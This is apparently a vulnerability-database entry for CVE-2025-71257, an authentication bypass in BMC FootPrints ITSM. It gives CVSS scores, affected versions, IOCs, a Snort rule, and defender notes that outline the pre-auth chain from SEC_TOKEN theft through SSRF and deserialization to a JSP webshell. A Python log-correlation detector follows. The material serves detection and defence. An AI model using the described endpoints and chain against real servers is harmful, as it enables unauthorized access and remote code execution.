CVE-2025-71257
published 2026-03-19

CVE-2025-71257: BMC FootPrints ITSM versions 20.20.02 through 20.24.01.001 contain an authentication bypass vulnerability due to improper enforcement of security filters on…

Priority: P1 (89) · critical · 9.1 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:N
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 4.40% (90.1th percentile)
BMC FootPrints ITSM versions 20.20.02 through 20.24.01.001 contain an authentication bypass vulnerability due to improper enforcement of security filters on restricted REST API endpoints and servlets. Unauthenticated remote attackers can bypass access controls to invoke restricted functionality and gain unauthorized access to application data and modify system resources. The following hotfixes remediate the vulnerability: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, and 20.24.01.

Affected (2 ranges)

Vendor            Product          Version range              Fixed in
bmc               footprints_itsm  20.20.02 – 20.24.01.001    (not listed)
bmc_software_inc  footprints       20.20.02 – 20.24.01.001    (not listed)

Detection & IOCs (extracted from sources)

url: /footprints/servicedesk/passwordreset/request/
cookie: SEC_TOKEN=
path: /footprints/servicedesk/externalfeed/RSS
path: /footprints/servicedesk/import/searchWeb
path: /footprints/servicedesk/aspnetconfig
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS BMC FootPrints SEC_TOKEN Extraction Authentication Bypass Attempted (CVE-2025-71257)"; flow:established,to_server; http.method; content:"GET"; http.uri; bsize:46; content:"/footprints/servicedesk/passwordreset/request/"; fast_pattern; reference:url,labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/; reference:cve,2025-71257; classtype:attempted-admin; sid:2068317; rev:1; metadata:affected_product BMC_FootPrints, attack_target Server, tls_state TLSDecrypt, created_at 2026_03_18, cve CVE_2025_71257, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2026_03_18, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Detect auth bypass exploitation by monitoring for unauthenticated GET requests to the password reset endpoint that result in a Set-Cookie header containing 'SEC_TOKEN='. The URI length is exactly 46 bytes.
  • The auth bypass (CVE-2025-71257) is the first step in a pre-auth RCE chain: SEC_TOKEN cookie obtained from /passwordreset/request/ is then used to reach SSRF endpoints (CVE-2025-71258, CVE-2025-71259) and the deserialization RCE endpoint (CVE-2025-71260). Correlate these requests in sequence from the same source IP.
  • For the deserialization RCE stage, look for POST/GET requests to /footprints/servicedesk/aspnetconfig with a __VIEWSTATE parameter containing a base64-encoded Java serialized object (starts with 'rO0AB').
  • After successful deserialization exploitation, a JSP webshell is dropped at a randomized path under /webapps/ROOT/. Monitor for new .jsp file creation under the webapps/ROOT directory and subsequent HTTP 200 responses containing 'System Information', 'OS User:', and 'Current Working Directory:'.
  • SSRF exploitation (CVE-2025-71259) is detectable by monitoring GET requests to /footprints/servicedesk/externalfeed/RSS with an external or internal URL in the feedUrl parameter from unauthenticated sessions.
  • SSRF exploitation (CVE-2025-71258) is detectable by monitoring GET requests to /footprints/servicedesk/import/searchWeb with an external or internal URL in the url parameter from unauthenticated sessions.
  • The Snort/ET rule (sid:2068317) requires TLS decryption to be effective against HTTPS-protected FootPrints deployments, as indicated by the tls_state:TLSDecrypt metadata.
  • The deserialization payload (CVE-2025-71260) randomizes the embedded JSP filename at runtime to evade static filename-based detection; defenders should not rely solely on a fixed filename like 'watchTowr.jsp'.
  • The auth bypass yields a SEC_TOKEN cookie from the unauthenticated /passwordreset/request/ endpoint; this token is then reused to access restricted REST API endpoints and servlets, so token issuance from this endpoint to unauthenticated clients is itself the bypass indicator.
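As an added illustration of the detection guidance above (this is not code from the advisory, the ET rule or the vendor), a small Python correlation routine over constructed proxy/WAF request records: it flags SEC_TOKEN issuance to an unauthenticated client on the 46-byte password-reset URI, then tags later hits on the SSRF and deserialization endpoints from the same source. The record layout, field names and sample values are assumptions.

```python
from dataclasses import dataclass

# Exact URI from the ET rule (bsize:46 means the URI is exactly 46 bytes long)
RESET_URI = "/footprints/servicedesk/passwordreset/request/"
# Endpoints used after the bypass, per the detection notes above
CHAIN_PATHS = {
    "/footprints/servicedesk/externalfeed/RSS": "SSRF (CVE-2025-71259)",
    "/footprints/servicedesk/import/searchWeb": "SSRF (CVE-2025-71258)",
    "/footprints/servicedesk/aspnetconfig": "deserialization (CVE-2025-71260)",
}


@dataclass
class Req:
    """One constructed request record; this field layout is an assumption."""
    src: str
    method: str
    uri: str
    req_cookie: str = ""   # Cookie header sent by the client
    set_cookie: str = ""   # Set-Cookie header returned by the server
    body: str = ""         # request body, if any


def detect(records):
    """Return (src_ip, description) findings in log order."""
    findings, token_holders = [], set()
    for r in records:
        path = r.uri.split("?", 1)[0]
        # Bypass indicator: reset endpoint hands a SEC_TOKEN to a client that had none
        if (r.method == "GET" and len(path) == 46 and path == RESET_URI
                and "SEC_TOKEN=" in r.set_cookie and "SEC_TOKEN=" not in r.req_cookie):
            findings.append((r.src, "auth bypass: SEC_TOKEN issued to unauthenticated client"))
            token_holders.add(r.src)
        # Chain correlation: same source later reaches the SSRF / deserialization endpoints
        elif path in CHAIN_PATHS and r.src in token_holders:
            desc = CHAIN_PATHS[path]
            # 'rO0AB' is the base64 prefix of a Java serialized stream (AC ED 00 05)
            if path.endswith("aspnetconfig") and "__VIEWSTATE=rO0AB" in (r.body + r.uri):
                desc += " with Java serialized __VIEWSTATE"
            findings.append((r.src, f"chain step after bypass: {desc}"))
    return findings


SAMPLE = [  # constructed records, not captured traffic
    Req("203.0.113.7", "GET", RESET_URI, set_cookie="SEC_TOKEN=abc123; Path=/"),
    Req("203.0.113.7", "GET", "/footprints/servicedesk/externalfeed/RSS?feedUrl=http://internal.example/",
        req_cookie="SEC_TOKEN=abc123"),
    Req("203.0.113.7", "POST", "/footprints/servicedesk/aspnetconfig",
        req_cookie="SEC_TOKEN=abc123", body="__VIEWSTATE=rO0ABXNyAAZ..."),
    # Already-authenticated client refreshing its token: not a bypass, not flagged
    Req("198.51.100.9", "GET", RESET_URI, req_cookie="SEC_TOKEN=legit", set_cookie="SEC_TOKEN=legit"),
]

if __name__ == "__main__":
    for src, desc in detect(SAMPLE):
        print(src, desc)
```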

CVSS provenance

NVD (CVSS v3.1): 9.1 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
NVD (CVSS v4.0): 6.9 MEDIUM, CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
VulnCheck: 6.9 MEDIUM